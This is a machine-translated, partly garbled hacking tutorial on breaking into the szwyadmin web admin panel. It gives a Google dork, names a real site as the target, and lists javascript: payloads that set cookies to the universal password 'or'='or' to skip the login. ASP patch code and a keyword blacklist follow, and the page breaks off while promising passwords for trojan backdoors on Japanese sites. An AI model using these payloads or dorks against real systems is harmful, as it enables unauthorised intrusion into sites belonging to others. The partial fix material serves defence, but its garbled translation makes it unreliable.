Is your vulnerability actually patched? Universal attack

Source: Internet
Author: User

First, I declare that we should stand by our conscience. We should not do anything about it. We will only explain a technology against the sky. If you do anything about it, you will be responsible for it. It has nothing to do with me!


Remember two points when patching vulnerabilities: 1. Whether you trust security or not; 2. Whether you trust security or not.

See the text: (szwyadmin vulnerability: intrusion using cookies and universal passwords)

Google: inurl:szwyadmin/login.asp

For example, from the search results I selected this site: http://www.jsxzxy.com/szwyadmin/login.asp

Intrusion code (copy it into the address bar; two alert boxes will pop up, click OK on each):

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));

Replacement code (code 2): admin_index.asp

Now the address becomes http://www.jsxzxy.com/szwyadmin/admin_index.asp and we are in. That is how the website is entered. In fact, this is an application that combines universal passwords and cookies, and it is essentially caused by inadequate universal password filtering!
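The cookie trick above can be reproduced offline. This is an added example, not code from the original page or from the szwyadmin application: it assumes the login check pastes the adminuser and adminpass cookie values into a SQL string, and it shows that a filter scanning only query-string and form input (as the safe.asp filter later on this page does) never sees the cookie, while bound parameters reject it. SQLite stands in for the site's database; the table, the stored account and the always-true input are constructed.

```python
import sqlite3

# Blacklists copied from the page's safe.asp (Method 2).
QUERY_BAD = "'|and|select|update|chr|delete|%20from|;|insert|mid|master.|set|chr(37)|=".split("|")
FORM_BAD = "'|(|)|;|=".split("|")
# Constructed sample input: a classic always-true string.
TAUTOLOGY = "' or '1'='1"

def make_db():
    """Constructed stand-in for the admin table; names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (adminuser TEXT, adminpass TEXT)")
    db.execute("INSERT INTO admin VALUES ('root', 'constructed-password')")
    return db

def blacklist_blocks(request):
    """Like safe.asp: scans query string and form only, never cookies."""
    checks = (("querystring", QUERY_BAD), ("form", FORM_BAD))
    for channel, badwords in checks:
        for value in request.get(channel, {}).values():
            if any(bad in value.lower() for bad in badwords):
                return True
    return False

def login_concat(db, cookies):
    """Assumed vulnerable check: cookie values pasted into the SQL text."""
    sql = ("SELECT COUNT(*) FROM admin WHERE adminuser='%s' AND adminpass='%s'"
           % (cookies.get("adminuser", ""), cookies.get("adminpass", "")))
    return db.execute(sql).fetchone()[0] > 0

def login_bound(db, cookies):
    """Same check with bound parameters: input stays data, never SQL."""
    sql = "SELECT COUNT(*) FROM admin WHERE adminuser=? AND adminpass=?"
    args = (cookies.get("adminuser", ""), cookies.get("adminpass", ""))
    return db.execute(sql, args).fetchone()[0] > 0

def demo():
    db = make_db()
    cookies = {"adminuser": TAUTOLOGY, "adminpass": TAUTOLOGY}
    return {
        "filter_blocks_form": blacklist_blocks({"form": {"name": TAUTOLOGY}}),
        "filter_blocks_cookie": blacklist_blocks({"cookies": cookies}),
        "concat_login": login_concat(db, cookies),
        "bound_login": login_bound(db, cookies),
        "bound_login_real": login_bound(
            db, {"adminuser": "root", "adminpass": "constructed-password"}),
    }

if __name__ == "__main__":
    print(demo())
```

Bound parameters close the injection, but a login state that the browser can write into a cookie is still client-controlled; keeping the authenticated flag in server-side session state removes that input entirely.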

---------- The lazy can skip what follows. The following is an explanation; the previous section is already complete ----------

[anti-day explanation:]

JavaScript escape() function [here we use this function to trick the website's verification]

Definition and usage
The escape() function encodes a string so that it can be read on all computers.

Syntax
escape(string)

Parameter: string. Required. The string to be escaped or encoded.

Return value
A copy of the encoded string, in which some characters are replaced with hexadecimal escape sequences.

Description
This method does not encode ASCII letters and digits, nor the following ASCII punctuation marks: * @ - _ + . /
All other characters are replaced by escape sequences.

Tips and notes
Tip: you can use unescape() to decode a string encoded with escape().
Note: ECMAScript v3 deprecates this method; applications should use decodeURI() and decodeURIComponent() instead.

Example
In this example, we use escape() to encode strings:

<script type="text/javascript">
document.write(escape("Visit w3school!") + "<br />")
document.write(escape("?!=()#%&"))
</script>

Output: [is it effective at deceiving our eyes?]

Visit%20w3school%21
%3F%21%3D%28%29%23%25%26

[Tracing the origin] The fix is to filter the universal password again. You cannot keep patching only the single hole; keywords such as or should also be restricted, as in the earlier repair methods (recommended by against the day):

Method 1: Replace filter character [A scam is over...]

Solution: in login, find:

username = request.form("name")
pass = request.form("pass")

and modify it to:

username = Replace(request.form("name"), "'", "''")
pass = Replace(request.form("pass"), "'", "''")

The syntax shields the ' and '' characters to achieve the effect.

Method 2 (in conn.asp): save the following code as safe.asp

Program code [or not added]:

<%
Dim query_badword, form_badword, i, err_message, err_web, name
err_message = 3
err_web = "javassafe.htm"   ' page to switch to when an error occurs
' Illegal GET parameters are defined in this part, separated by "|"
query_badword = "'|and|select|update|chr|delete|%20from|;|insert|mid|master.|set|chr(37)|="
' Illegal POST parameters are defined in this part, separated by "|"
form_badword = "'|(|)|;|="
On Error Resume Next

' Check every query-string value against the GET blacklist
If Request.QueryString <> "" Then
    chk_badword = Split(query_badword, "|")
    For Each query_name In Request.QueryString
        For i = 0 To UBound(chk_badword)
            If InStr(LCase(Request.QueryString(query_name)), chk_badword(i)) <> 0 Then
                Select Case err_message
                    Case "1"
                        Response.Write "<script>alert('Parameter passing error! The value of the parameter " & name & " contains an invalid string!\nDo not include invalid characters such as: and update delete ; insert mid master in the parameter!');window.close();</script>"
                    Case "2"
                        Response.Write "<script>location.href='" & err_web & "'</script>"
                    Case "3"
                        Response.Write "<script>alert('Parameter passing error! The value of the parameter " & name & " contains an invalid string!\nDo not include invalid characters such as: and update delete ; insert mid master in the parameter!');location.href='" & err_web & "';</script>"
                End Select
                Response.End
            End If
        Next
    Next
End If

' Check every form value against the POST blacklist
If Request.Form <> "" Then
    chk_badword = Split(form_badword, "|")
    For Each name In Request.Form
        For i = 0 To UBound(chk_badword)
            If InStr(LCase(Request.Form(name)), chk_badword(i)) <> 0 Then
                Select Case err_message
                    Case "1"
                        Response.Write "<script>alert('Error! The value of form " & name & " contains an invalid string!\nYour illegal operations have been recorded. Please stop the illegal activities immediately!');window.close();</script>"
                    Case "2"
                        Response.Write "<script>location.href='" & err_web & "'</script>"
                    Case "3"
                        Response.Write "<script>alert('Error! The value of the parameter " & name & " contains an invalid string!\n\nThank you for coming! Please stop illegal behavior!');location.href='" & err_web & "';</script>"
                End Select
                Response.End
            End If
        Next
    Next
End If
%>

[Extended: the universal passwords of the ASP horse backdoors popular in China, and the previous universal passwords]
These Trojans are basically popular ASP Trojans in China. If you find these Trojans on the Japanese site, you can try these passwords, some of which are universal passwords collected, some are the default passwords, and some others are sent to me. I will post them all to you:
